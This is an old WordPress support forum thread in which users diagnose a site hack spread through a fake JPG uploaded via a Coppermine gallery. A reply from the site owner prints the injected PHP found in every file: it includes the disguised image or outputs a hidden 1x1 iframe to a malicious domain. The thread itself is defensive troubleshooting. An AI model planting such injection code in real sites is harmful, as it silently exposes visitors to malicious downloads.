Title: Help
Last modified: August 19, 2016

---

# Help

 *  Resolved [Pennykeating](https://wordpress.org/support/users/pennykeating/)
 * (@pennykeating)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/)
 * Not sure what happened this morning to my site…. i started getting this error:
 * Warning: Cannot modify header information – headers already sent by (output started
   at /home/content/P/e/n/PennyKeating/html/Images/albums/userpics/10001/45563131x.
   jpg:6) in /home/content/P/e/n/PennyKeating/html/wordpress/wp-includes/pluggable.
   php on line 689
 * I’m upgraded to 2.5, i cannot even get into my admin panel to change anything.
   If you view the site in FF, works ok. If you view in IE i’m getting a script 
   error. Can’t log into admin panel at all.
    [http://www.kiefersutherlandhome.com](http://www.kiefersutherlandhome.com)
 * Anyone have a fix? Help 🙂

Viewing 14 replies - 1 through 14 (of 14 total)

 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744162)
 * that image is not an image:
 * [http://www.kiefersutherlandhome.com/Images/albums/userpics/10001/45563131x.jpg](http://www.kiefersutherlandhome.com/Images/albums/userpics/10001/45563131x.jpg)
 * take a look at the in IE. you have been hacked.
 * (and to think I was questioned recently about why I surf with JS disabled)
 *  [mechx1](https://wordpress.org/support/users/mechx1/)
 * (@mechx1)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744168)
 * Your site is attempting to download a virus, you need to get your space swept
 *  Thread Starter [Pennykeating](https://wordpress.org/support/users/pennykeating/)
 * (@pennykeating)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744177)
 * grrrrr –
 * so, if i completely lose wordpress and rebuild it, will that fix it? and how 
   did i get a virus!!! HELP!
 *  Thread Starter [Pennykeating](https://wordpress.org/support/users/pennykeating/)
 * (@pennykeating)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744180)
 * and…. mechx1, how do i sweep my site!!! can i do that on this end or from my 
   hosting end?
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744184)
 * that didnt look like a virus to me, or anything that was propagating a virus.
   if you have that still, email it to me and Ill look again whoo (AT) whoo (dot)
   org
 * Either way, you would do well to start with trying to figure out who, if not 
   you, uploaded that file. If you uploaded it, and it was a real image at that 
   time, then obviously its been overwritten, maliciously.
 * If it wasnt you, then you might have a convo with whomever did.
 * As far as troubleshooting, moving beyond that, the posts on here dealing with
   recently hacked sites are growing in mubers by the day, so its hard to keep up
   with specific instructions.
 * You might want to do a little reading.
 * [http://wordpress.org/support/topic/168964?replies=20](http://wordpress.org/support/topic/168964?replies=20)
   
   [http://wordpress.org/support/topic/168952?replies=33](http://wordpress.org/support/topic/168952?replies=33)
 * along those same lines, it would be very useful to have the timestamp on that
   file, as it would tell you/us what date it was modified, but you appear to have
   deleted it.
 * and while I am here, I’ll pimp this again:
 * I have a plugin that provides logging.. intended for troubleshooting exactly 
   this kind of stuff.
 * [http://www.village-idiot.org/archives/2008/04/16/postlogger-for-wordpress/](http://www.village-idiot.org/archives/2008/04/16/postlogger-for-wordpress/)
 * eventually people will get with it and realize that they need to do more than
   just “clean up” after a successful attack.
 *  [mechx1](https://wordpress.org/support/users/mechx1/)
 * (@mechx1)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744185)
 * I looked at my log and it looks like the culprit who was trying the intrusion
   is ccfelomvhk.com. So you may not have a virus in your physical space, but your
   site is somehow pointing visitors to this other site which does try an intrusion.
   There is a chance that you have the iframe hack, one thread that details it is
   [here](http://wordpress.org/support/topic/166902?replies=20) You say that you
   cannot get into admin, is it refusing your password or what?
 *  [mechx1](https://wordpress.org/support/users/mechx1/)
 * (@mechx1)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744187)
 * My link reference is the first one whooami gave you.
 *  Thread Starter [Pennykeating](https://wordpress.org/support/users/pennykeating/)
 * (@pennykeating)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744195)
 * i probably should have waited… but i just deleted the whole darn thing, and i’m
   rebuilding.
 * I wish i had both of your skills in this ….. i have had a few sites up and running
   for a long time, and i always have problems with security. is there a way to 
   completely secure wordpress *or coppermine for that matter…* The whole thing 
   began with that supposed jpg uploaded thru coppermine, so i’m assuming this thing
   is a coppermine as well as a wordpress issue. I’m ready to throw in the towel
   and just go back to a normal html site with no “problems”. *laughs* I will read
   into all of this, and hopefully i will be able to secure my site a little better.
   Thank you so much for all the help! And PLEASE, if you have any suggestions on
   securing my sites, please feel free to email me!!! Penny at pennykeating.com 
   🙂 I thank you both!
 * and whooami i’ll be looking into that plugin *wink*
 *  [whooami](https://wordpress.org/support/users/whooami/)
 * (@whooami)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744198)
 * coppermine is mentioned in on of the other threads on here..
 * Unfortunately, just like with WP (i noticed you were on 2.5, yay!) you have to
   keep up with security upgrades on it as well..
 * I wouldnt throw in the towel, if I were you, I would just make sure that you 
   stay on top of things, and take deep breaths. Atleast you caught it.
 *  Thread Starter [Pennykeating](https://wordpress.org/support/users/pennykeating/)
 * (@pennykeating)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744202)
 * OMG it’s on my other site too. LOL
 * This is NOT good. It’s the iframe thing, *see, i’ve been reading!* and it looks
   like it’s redirecting just like the thread is saying.
 * [http://www.roccodelucafan.com](http://www.roccodelucafan.com)
 * this is just not my day *laughs*
 *  Thread Starter [Pennykeating](https://wordpress.org/support/users/pennykeating/)
 * (@pennykeating)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744204)
 * ………….. digs in at her desk and prepares to clean up a mess :)…..
 *  Thread Starter [Pennykeating](https://wordpress.org/support/users/pennykeating/)
 * (@pennykeating)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744210)
 * Before i deleted my wordpress install, i copied it – every file has this:
 * <?php
 *  if (file_exists(“/home/content/P/e/n/PennyKeating/html/Images/albums/userpics/
   10001/45563131x.jpg”)) {
 *  include(“/home/content/P/e/n/PennyKeating/html/Images/albums/userpics/10001/
   45563131x.jpg”);
 *  } else {
 *  echo “<iframe src=’http://ccfelomvhk.com/dl/adv542.php’ width=1 height=1></iframe
   >”;
 *  }
 *  ?>
 * so yup, it’s that bad boy 🙂
 * Thanks for the help 🙂 Looks like this is affecting a LOT of people!
 *  [dolhijn](https://wordpress.org/support/users/dolhijn/)
 * (@dolhijn)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744250)
 * Hi
 * I had the 45563131x.jpg picture inserted in my Path to custom header include 
   in the config tab (logged in as administrator). That picture is not a picture
   but a script (just url it in IE) which is uploaded to the userpics map. Remove
   the include header setting and delete the file, the problem of the counter applet
   etc. and the ccfelomvhk.com thing are gone. I have some probably youngsters logging
   in to my gallery as registered users and changing these settings. I am curious
   how they inserted the code on the config tab. U might want to restore to default
   settings if anything else has changed and reconfigure.
    The only way i saee to
   avoid this is to aks wordpress to rewrite security settings or to only use validated
   users or email confirmation (I didnt do both).
 *  [insiderevolution](https://wordpress.org/support/users/insiderevolution/)
 * (@insiderevolution)
 * [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744273)
 * my host and I were also attacked by the same thing. I think it has to do with
   coppermine gallery. I don’t have one of those but my host does. I’m not sure 
   though, but it added that code to ALL of my .php files. If you search google 
   for “ccfelomvhk” you will get TONS of results of other people who were also attacked.
   As far as I know, the only thing to do is go through and edit ALL your .php files
   and remove the code that was added.

Viewing 14 replies - 1 through 14 (of 14 total)

The topic ‘Help’ is closed to new replies.

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 14 replies
 * 5 participants
 * Last reply from: [insiderevolution](https://wordpress.org/support/users/insiderevolution/)
 * Last activity: [17 years, 11 months ago](https://wordpress.org/support/topic/help-19/#post-744273)
 * Status: resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics